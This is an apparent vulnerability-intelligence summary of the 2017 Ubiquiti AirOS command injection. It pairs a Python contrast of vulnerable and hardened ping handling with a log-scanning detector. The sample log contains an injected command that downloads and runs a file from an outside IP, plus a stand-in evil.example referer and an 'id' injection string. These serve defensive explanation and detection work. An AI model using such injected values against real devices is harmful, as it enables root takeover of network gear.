Full Report
We actually use Ubiquiti Wi-Fi gear and have found it pretty good; I didn’t realise their security was so whack and they were using PHP 2.0.1 from 1997! In this case a malicious URL can inject commands into a Ubiquiti device which, surprise, surprise, runs the web service as root. Apparently, they also got scammed […]
Analysis Summary
Summarized, actionable intelligence on the reported Ubiquiti flaw, from a vulnerability research perspective:
# Vulnerability: Authenticated OS Command Injection in Ubiquiti AirOS (`pingtest_action.cgi`)
## CVE Details
* **CVE ID:** None is listed in the article. The flaw was reported by SEC Consult Vulnerability Lab (advisory 20170316-0, per the reference URL below).
* **CVSS Score:** Not provided in the text.
* **CWE:** CWE-78 (Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')) for the injection itself. The two aggravating conditions the report describes map to CWE-352 (Cross-Site Request Forgery) for the missing request-forgery protection and CWE-250 (Execution with Unnecessary Privileges) for the web service running as root.
## Affected Systems
* **Products:** Ubiquiti networking gear running AirOS; the examples named in the report are **toughswitch** and **airgateway**. (Note: UniFi, EdgeMAX, and AmpliFi products were later stated to be *not* affected.)
* **Versions:** AirOS firmware builds shipping **PHP/FI 2.0.1 (released 1997)**. Exact version ranges are not given in the article; the vendor advisory is the authoritative source for which builds are fixed.
* **Configurations:** Any affected device whose web management interface is reachable from a browser an administrator uses. Because the request is issued by the logged-in victim's browser, the interface does not need to be exposed to the Internet for the attack to work.
## Vulnerability Description
The flaw resides in the script `pingtest_action.cgi`. The script passes a request variable into an operating system command without neutralizing shell metacharacters, so an attacker who controls that variable can append arbitrary commands. A contributing factor is the web stack itself: PHP/FI 2.0.1, a 1997 release that has been unmaintained for two decades. Two further conditions turn the bug into a full compromise. First, the web service runs with **root privileges**, so injected commands run as root. Second, the interface has no Cross-Site Request Forgery (CSRF) protection; the injection is "authenticated" only in the sense that the request must carry a valid session, and CSRF supplies exactly that: a victim who is logged in to the device and clicks a crafted link, or merely visits a malicious page, has their browser send the single GET request with the session attached.
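The pattern described above, as an added illustration in Python rather than the device's PHP/FI CGI (this is not Ubiquiti's code or SEC Consult's withheld PoC; the parameter name `ip` and the ping flags are assumptions): a ping handler that interpolates the target into a shell command, beside a hardened version that allow-list-validates the target and invokes ping without a shell.

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# no leading or trailing hyphen, 63 chars per label, 253 overall.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def vulnerable_ping_command(ip: str) -> list:
    """The CWE-78 shape: the request parameter (assumed name `ip`) is pasted
    into a command string that /bin/sh will parse. A value such as
    '127.0.0.1; id' runs `id` as a second command, with the web server's
    privileges (root, per the advisory)."""
    return ["/bin/sh", "-c", f"ping -c 1 {ip}"]


def validate_target(target: str) -> str:
    """Allow-list check: an IPv4/IPv6 literal or an RFC 1123 hostname.
    Everything else (spaces, ';', '|', '`', '$(' ...) is rejected."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if HOSTNAME_RE.match(target):
        return target
    raise ValueError(f"invalid ping target: {target!r}")


def hardened_ping_command(ip: str) -> list:
    """Validated target passed as one argv element, no shell involved.
    Even if validation were bypassed, metacharacters would reach ping as a
    literal argument instead of being interpreted by sh."""
    return ["ping", "-c", "1", validate_target(ip)]


def run_ping(ip: str) -> int:
    """Execute the hardened command (argv list, shell=False) and return
    ping's exit status. Not called in the demo below, so it runs offline."""
    return subprocess.run(hardened_ping_command(ip), check=False).returncode


if __name__ == "__main__":
    for target in ("192.0.2.1", "127.0.0.1; id"):
        print("vulnerable:", vulnerable_ping_command(target))
        try:
            print("hardened:  ", hardened_ping_command(target))
        except ValueError as exc:
            print("hardened:   rejected:", exc)
```

The two defences are deliberately layered: the allow-list rejects anything that is not a plausible ping target, and the argv list means that even a validation bypass yields a bad argument to `ping` rather than a second command for `sh`. Neither addresses the other two conditions in the report; a CSRF token on the request and a non-root service account are separate fixes.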
## Exploitation
* **Status:** SEC Consult removed the Proof-of-Concept from the advisory because no patch was available at disclosure, but the description (a single crafted GET request to `pingtest_action.cgi`) leaves little doubt that the flaw is exploitable.
* **Complexity:** **Low**. The entire attack is one GET request. Because there is no CSRF defence, the attacker does not need to reach the device directly; luring a logged-in administrator to click a crafted link or visit a malicious website is enough.
* **Attack Vector:** **Network**. The attacker needs no credentials of their own, but the victim must hold an authenticated session when the request fires, so user interaction is required.
## Impact
Successful exploitation gives the attacker arbitrary command execution as root on the device. Since the device sits in the network path, the report warns this can extend to a takeover of the network it manages.
* **Confidentiality:** **High** (root access allows retrieval of sensitive configuration and potentially network traffic).
* **Integrity:** **High** (attacker can modify device configurations and network routing).
* **Availability:** **High** (attacker can take the device offline or compromise network availability).
## Remediation
### Patches
* **Patches Available:** Yes. Ubiquiti released fixed firmware for the affected AirOS product lines on or around March 18, 2017 (per the update noted in the article). Check the vendor thread linked below for the fixed build of each product line, then confirm the running firmware version on every device after upgrading.
### Workarounds
* No vendor workaround was published before the patch. Standard mitigations reduce exposure without removing the flaw: restrict the web management interface to a dedicated management network or source-address allow-list, administer devices from a browser session that is not used for general browsing, and log out when finished. Note that network restrictions alone do not stop the CSRF path, because the request originates from the administrator's own browser inside the trusted network.
## Detection
* **Indicators of Compromise:** Unexpected outbound connections originating from the device (e.g., reverse shells or downloads of second-stage payloads), configuration changes such as new accounts, changed credentials or added SSH keys, and unusual traffic patterns through the Ubiquiti gateway/router.
* **Detection Methods and Tools:** Inspect requests to `pingtest_action.cgi` for query parameters containing shell metacharacters (`;`, `|`, `` ` ``, `$(`, `&`, `>`); a third-party Referer on such a request is consistent with the CSRF delivery path. Two caveats: the management interface is normally served over HTTPS, so inspection has to happen on the device or at a TLS-terminating proxy, and an attacker with root can alter the device's local logs, so they should be forwarded off-box. Independently, audit firmware versions across the fleet against the vendor's list of fixed builds.
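The detection logic described above, run over constructed access-log lines (an added example, not a tool from the advisory or the vendor; the log format is Apache/nginx "combined", and the query parameter names and payloads are assumptions, only the script name comes from the report):

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample log. Line 2 carries a URL-encoded ';'-chained payload
# with a third-party Referer; line 4 carries a backtick substitution.
SAMPLE_LOG = """\
192.0.2.10 - - [16/Mar/2017:10:01:02 +0000] "GET /pingtest_action.cgi?ip=192.0.2.1&count=4 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.10 - - [16/Mar/2017:10:01:09 +0000] "GET /pingtest_action.cgi?ip=192.0.2.1%3Bwget%20http%3A%2F%2F198.51.100.7%2Fx%20-O%20%2Ftmp%2Fx%3Bsh%20%2Ftmp%2Fx HTTP/1.1" 200 512 "http://evil.example/" "Mozilla/5.0"
192.0.2.11 - - [16/Mar/2017:10:02:00 +0000] "GET /index.cgi HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.12 - - [16/Mar/2017:10:03:15 +0000] "GET /pingtest_action.cgi?ip=%60id%60 HTTP/1.1" 200 512 "-" "curl/7.52.1"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)"'
)
TARGET_SCRIPT = "pingtest_action.cgi"
# Characters that let /bin/sh terminate the intended command or substitute
# the output of another one.
SHELL_META_RE = re.compile(r"[;&|`$<>\n]")


def suspicious_requests(log_text: str) -> list:
    """Return one record per query parameter of a pingtest_action.cgi request
    whose decoded value contains a shell metacharacter."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith("/" + TARGET_SCRIPT):
            continue
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            # parse_qsl already percent-decoded once; decode again so a
            # double-encoded payload (%253B -> %3B -> ;) is also caught.
            decoded = unquote(value)
            if SHELL_META_RE.search(decoded):
                hits.append({
                    "src": m["src"],
                    "ts": m["ts"],
                    "param": name,
                    "value": decoded,
                    # A third-party Referer on this request matches the
                    # CSRF delivery path described in the advisory.
                    "referer": m["referer"],
                })
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

Matching on the decoded value rather than the raw query string matters because a browser following a crafted link sends the payload percent-encoded, as in the sample's second line; a raw-string match for `;` would miss it. The `count=4` parameter on the first line shows the benign case passing through untouched.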
## References
* Vendor Advisory URL (Defanged): `community.ubnt.com/t5/airMAX-General-Discussion/AirOS-Vulnerability-Issue-Update-3-18-17/td-p/1869309`
* SEC Consult Advisory URL (Defanged): `sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20170316-0_Ubiquiti_Networks_authenticated_command_injection_v10.txt`